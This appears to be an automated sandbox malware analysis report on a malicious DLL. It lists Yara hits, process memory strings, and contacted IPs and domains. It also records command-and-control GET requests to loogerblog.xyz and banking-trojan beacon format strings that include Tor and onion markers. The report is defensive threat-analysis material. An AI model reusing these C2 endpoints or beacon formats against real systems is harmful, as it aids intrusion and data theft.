Source: Yara match	File source: 00000001.00000003.346712408.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.490922654.000001ED55336000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346417089.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.405016881.000000000572C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.696291358.0000021913236000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346784908.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346795149.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.465913433.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346535972.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.705764448.0000000004E16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.490298727.0000000000916000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5548, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4724, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6712, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4540, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.239.86.173	unknown	Romania	35215	MERITAPL	false
185.156.172.54	unknown	Romania	9009	M247GB	false
151.101.1.44	unknown	United States	54113	FASTLYUS	false
89.44.9.160	unknown	Romania	9009	M247GB	false
172.217.22.66	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
contextual.media.net	2.18.68.31	true
pagead46.l.doubleclick.net	172.217.22.66	true
tls13.taboola.map.fastly.net	151.101.1.44	true
hblg.media.net	2.18.68.31	true
lg3.media.net	2.18.68.31	true
resolver1.opendns.com	208.67.222.222	true
loogerblog.xyz	193.239.86.173	true
web.vortex.data.msn.com	unknown	unknown
www.msn.com	unknown	unknown
1.0.0.127.in-addr.arpa	unknown	unknown
srtb.msn.com	unknown	unknown
img.img-taboola.com	unknown	unknown
8.8.8.8.in-addr.arpa	unknown	unknown
cvision.media.net	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://loogerblog.xyz/images/heS41tWM4/dTuObjanXSKYXyb0FkTo/Sul08DWWYjtvEXiZbeu/IttDYgTEILEomnfMBe_2F9/LlGO2SSA0NV0T/hSQO_2BH/cC6AH5VKEVWx8JPacUwAYFJ/hgtk8WIB3K/d_2BdLS2yTOt6Dg4V/0VLl0wtt1zqh/gtyvfsYSOv2/OI80MTVkGXkXTK/hTK1aCHhr3hGK_2B_2Bhy/9cV8P8A2W8lNQ3ZP/mR3nBi4b/B.avi	false	Avira URL Cloud: safe	unknown
http://loogerblog.xyz/images/NIcuL5NVjxwM/2GiryhKI5_2/FNJaA9fYIAvcIp/w_2B_2BISN4Xz1NACkLBL/pkU7CWqAnACS3mfT/L8UY8eM5OH2UEUf/YkINfq3G1re2fm3O_2/Bm50wSCja/z2jV3OYUZHUlZjtC6nrq/EjBj_2BKXD5RuU2KuhV/Cl0uV3h6LO61AkcuYZIVPE/IwiDB_2Fh5ocS/vj9JcGyf/6k71ht.avi	false	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: regsvr32.exe.4540.1.memstr

Multi AV Scanner detection for submitted file

Source: 5fd885c499439tar.dll	Virustotal: Detection: 18%			Perma Link
Source: 5fd885c499439tar.dll	ReversingLabs: Detection: 17%

Machine Learning detection for sample

Source: 5fd885c499439tar.dll

Joe Sandbox ML: detected

Spreading:

Contains functionality to get notified if a device is plugged in / out

Source: C:\Windows\explorer.exe

Code function: 30_2_04E0174C RegisterDeviceNotificationA,

30_2_04E0174C

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FA32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_04FA32BA
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEA85C FindFirstFileW,DeleteFileW,FindNextFileW,	30_2_04DEA85C
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF0C34 FindFirstFileW,	30_2_04DF0C34
Source: C:\Windows\explorer.exe	Code function: 30_2_04E00180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,	30_2_04E00180

Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy

Networking:

Creates a COM Internet Explorer object

Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

Found Tor onion address

Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 151.101.1.44 151.101.1.44
Source: Joe Sandbox View	IP Address: 172.217.22.66 172.217.22.66

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: Joe Sandbox View	JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View	JA3 fingerprint: 7dd50e112cd23734a310b90f6f44a7cd

Source: unknown	TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown	TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown	TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54

Source: global traffic	HTTP traffic detected: GET /images/NIcuL5NVjxwM/2GiryhKI5_2/FNJaA9fYIAvcIp/w_2B_2BISN4Xz1NACkLBL/pkU7CWqAnACS3mfT/L8UY8eM5OH2UEUf/YkINfq3G1re2fm3O_2/Bm50wSCja/z2jV3OYUZHUlZjtC6nrq/EjBj_2BKXD5RuU2KuhV/Cl0uV3h6LO61AkcuYZIVPE/IwiDB_2Fh5ocS/vj9JcGyf/6k71ht.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: loogerblog.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: loogerblog.xyzConnection: Keep-AliveCookie: PHPSESSID=jk7j02809o01qf4vm1q8i24ab4; lang=en
Source: global traffic	HTTP traffic detected: GET /images/mbvAWlXhGgjVcTCfFjQ/3O2AqJHvXl_2F3rHmST_2F/JBzJ8PgEHj9az/YhLHOgEV/FDnk_2BI6y_2FNZ1SYC0DHX/yz_2FidSfI/ISjXdHdSruWXI8x4L/I9bnuo4yasJ3/EeDt6cIikbB/1cEqD7MX_2Frsy/QkskFGS9_2BRFwpkzEev_/2FdOjUmi3y2iP97w/gNY3W1_2FvHzBhL/aaNiZHe0/y.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: loogerblog.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=jk7j02809o01qf4vm1q8i24ab4
Source: global traffic	HTTP traffic detected: GET /images/heS41tWM4/dTuObjanXSKYXyb0FkTo/Sul08DWWYjtvEXiZbeu/IttDYgTEILEomnfMBe_2F9/LlGO2SSA0NV0T/hSQO_2BH/cC6AH5VKEVWx8JPacUwAYFJ/hgtk8WIB3K/d_2BdLS2yTOt6Dg4V/0VLl0wtt1zqh/gtyvfsYSOv2/OI80MTVkGXkXTK/hTK1aCHhr3hGK_2B_2Bhy/9cV8P8A2W8lNQ3ZP/mR3nBi4b/B.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: loogerblog.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=jk7j02809o01qf4vm1q8i24ab4

Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmp	String found in binary or memory: :2020121520201216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmp	String found in binary or memory: :2020121520201216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 3656 equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000017.00000003.520930888.0000028A7B721000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 00000025.00000003.525110655.0000000004E24000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micro
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
